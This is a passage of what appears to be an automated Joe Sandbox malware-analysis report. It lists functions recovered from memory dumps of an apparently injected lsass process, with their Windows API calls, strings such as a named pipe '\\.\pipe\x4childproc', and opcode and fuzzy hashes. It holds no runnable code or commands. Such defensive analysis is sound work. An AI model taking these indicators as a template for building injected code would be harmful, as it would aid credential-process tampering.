                                                  • Opcode Fuzzy Hash: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction Fuzzy Hash: 54318223608B81D6F710DF66A88C75DA3A0F748B95F464227DF8947B26DF38C56E8740

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction ID: 33f7ed36af2fefc6d203575c3214fd6010b4da138853780cb206688a2c37ee6c
                                                  • Opcode Fuzzy Hash: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction Fuzzy Hash: 40313E32614B81D6FB50DF66A8CC75E63A0B784F94F0642279F9A43726DF38C56E8600
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction ID: 00d74c43c27a037204f56f42bd6506568035e9e66eb523270ea82a6697344e14
                                                  • Opcode Fuzzy Hash: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction Fuzzy Hash: EED17872604B80CAFB609B69D4CC39D7BA0F759B98F060217EF8997B96DB34C599C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction ID: dec09f78486efbec02b2eba68a830b312f558bafcd1a247745259b4e91425ab2
                                                  • Opcode Fuzzy Hash: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction Fuzzy Hash: 3BD19A32610B80CAFB609B65D48D39E77A0F755798F020217EFA957B9BDB34D5A8CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction ID: e29a73851ae29a80712b9ad570ecdb8a0774f8b50bcb9da91304042cc4ae3603
                                                  • Opcode Fuzzy Hash: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction Fuzzy Hash: 5541E162321B50C1FA15CB169CCCB9D2391FB49BA4F0A42279F698B796EF3DC95D8300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction ID: 6a1ed1a32f120e200d77443a3bcc906e5d2e09d0c431b395040f3f9e02c1660b
                                                  • Opcode Fuzzy Hash: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction Fuzzy Hash: D6413C73214B84C6E760CF61E48C79E77A1F388B98F45822ADB8907B59DF39C599CB40
                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,00000202C0AED12E,?,?,?,?,?,?,?,?,00000202C0AED8ED,?,?,00000001), ref: 00000202C0AED9D7
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AED12E,?,?,?,?,?,?,?,?,00000202C0AED8ED,?,?,00000001), ref: 00000202C0AED9F6
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AED12E,?,?,?,?,?,?,?,?,00000202C0AED8ED,?,?,00000001), ref: 00000202C0AEDA1E
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AED12E,?,?,?,?,?,?,?,?,00000202C0AED8ED,?,?,00000001), ref: 00000202C0AEDA2F
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AED12E,?,?,?,?,?,?,?,?,00000202C0AED8ED,?,?,00000001), ref: 00000202C0AEDA40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction ID: b4b8fb09c6da153ad5f677730154a9641cd7cb1902f8a54f1dc41d98c11790e5
                                                  • Opcode Fuzzy Hash: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction Fuzzy Hash: 67115E207057D0C1FE58A7256ADD36D2142AB847F4F0A9337ABBD476D7DE28D96E8200
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\x4childproc
                                                  • API String ID: 166002920-1140171592
                                                  • Opcode ID: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction ID: 714541c3da66526a0d2e1b4e33c02c8e59bcc763dcc3cb78c642c64066003c8f
                                                  • Opcode Fuzzy Hash: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction Fuzzy Hash: E7113732628B40C2F7108B65F48C75E7760F789BA4F504216EBA906AA9CF3DC259CB44
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: 1b00272833c1eaf5dc53be6cee30b01d00cf05646053c9ebb1a4e64963de9811
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: DE8102216007C0C6FA54EB6598CD3AD63D0AB85B84F464127DFE947393EB39CB6E8740
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AEA6E7,?,?,?,00000202C0AE911C,?,?,?,?,00000202C0AE8C25), ref: 00000202C0AEA5AD
                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AEA6E7,?,?,?,00000202C0AE911C,?,?,?,?,00000202C0AE8C25), ref: 00000202C0AEA5BB
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AEA6E7,?,?,?,00000202C0AE911C,?,?,?,?,00000202C0AE8C25), ref: 00000202C0AEA5E5
                                                  • FreeLibrary.KERNEL32(?,?,?,00000202C0AEA6E7,?,?,?,00000202C0AE911C,?,?,?,?,00000202C0AE8C25), ref: 00000202C0AEA653
                                                  • GetProcAddress.KERNEL32(?,?,?,00000202C0AEA6E7,?,?,?,00000202C0AE911C,?,?,?,?,00000202C0AE8C25), ref: 00000202C0AEA65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction ID: d9cce6e1f551655e1de9e429514146959fb4f17febf159a566817384e29d2fa0
                                                  • Opcode Fuzzy Hash: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction Fuzzy Hash: FE31A322312B80D1FE529B52A88C75D2394BB66BA0F1F4627DFAD0B392DF38D55D8310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction ID: 9597f69c41b6237c3f8a53a8e067f33031b46f6d454dfbe3120665474ed85fe4
                                                  • Opcode Fuzzy Hash: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction Fuzzy Hash: B7116D32310B40C6F7509B52E88C71D62A0F788BE8F054227EB5E87BA6DF39C9188744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction ID: 84a21920c66ed8a1a9f49f25080e7ee315c733db0db28f937111eddd49da807e
                                                  • Opcode Fuzzy Hash: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction Fuzzy Hash: 45117C26304780C2FB149B61E48C66E62A0FB88B94F06002BDF9D07796EF3EC65C8700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 3c71be769f0a5cb5e2c769ed66c005fe4416e84d447ca1635e312c6679bbf07e
                                                  • Instruction ID: 0c32d501eb7c6e588fc610ad7813d940b6b33cbf42b78eb41a6b9a368f21a774
                                                  • Opcode Fuzzy Hash: 3c71be769f0a5cb5e2c769ed66c005fe4416e84d447ca1635e312c6679bbf07e
                                                  • Instruction Fuzzy Hash: 3FD19776208B88C2EA70DB16E49835EB7A4F388B88F114517EBDD477A6DF38C559CB40
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AED8FF
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AED935
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AED962
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AED973
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AED984
                                                  • SetLastError.KERNEL32(?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AED99F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction ID: a328ea74db3a1ec318f3f89511756a0508a991b4c11d2e5b1512a7a08d09c4ed
                                                  • Opcode Fuzzy Hash: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction Fuzzy Hash: 581151203057D0C2FE54A7315ADD32D6292AB487B4F065727EBBA47BD7DE28C86D8340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction ID: c66747de657e9532756416138762eea88d82779be50d71b63c9e5dda4c9f787a
                                                  • Opcode Fuzzy Hash: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction Fuzzy Hash: EA01ED66615740C2FB249B66E8CCB1D73A4BF48B45F05052BCA4D067A6EF3EC56C8704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction ID: b53f2d31899ba685af06b847d60d6f87e0736c238bbe8454763678d7dd210e04
                                                  • Opcode Fuzzy Hash: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction Fuzzy Hash: ADF06D62311B40D1FE149B64E8CC36E6320BB887A1F56121BDBAA462E6DF3DC55DC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction ID: 35624a34481f3ddc355e0efd2bb8700a280f62b7ec3b0eed36315fc621398ce2
                                                  • Opcode Fuzzy Hash: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction Fuzzy Hash: 5EF0A722704B80D2FA508B57B99C11D6361FB48FC0F459133EF660BB1ADF2CC5598700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f6859916c19b6cfbcb507cf25c27f09489149bbcb7d7f97a4334c647396ff50a
                                                  • Instruction ID: 17104d51da417727355a515fdd1a89b50f0d4f8bb213c608677245f22c3f09cb
                                                  • Opcode Fuzzy Hash: f6859916c19b6cfbcb507cf25c27f09489149bbcb7d7f97a4334c647396ff50a
                                                  • Instruction Fuzzy Hash: 5902A536219B84C6EBA0CB55F49875EB7A0F385794F110117EBDE87BAADB78C458CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: ca3cd154e60a15d8a4e1dbc58d691a45d730f05f61dafc41667bf4e2f9e70319
                                                  • Instruction ID: ae2738ec00e51988ce4dad14a3e4015730666bd36bf817f97d1b4cb3b24bbad4
                                                  • Opcode Fuzzy Hash: ca3cd154e60a15d8a4e1dbc58d691a45d730f05f61dafc41667bf4e2f9e70319
                                                  • Instruction Fuzzy Hash: B161A076519B84C6EA60CB25F4DC71EB7A0F388748F110117EB9A87BA6DB78C958CB00
                                                  APIs
                                                  Memory Dump Source
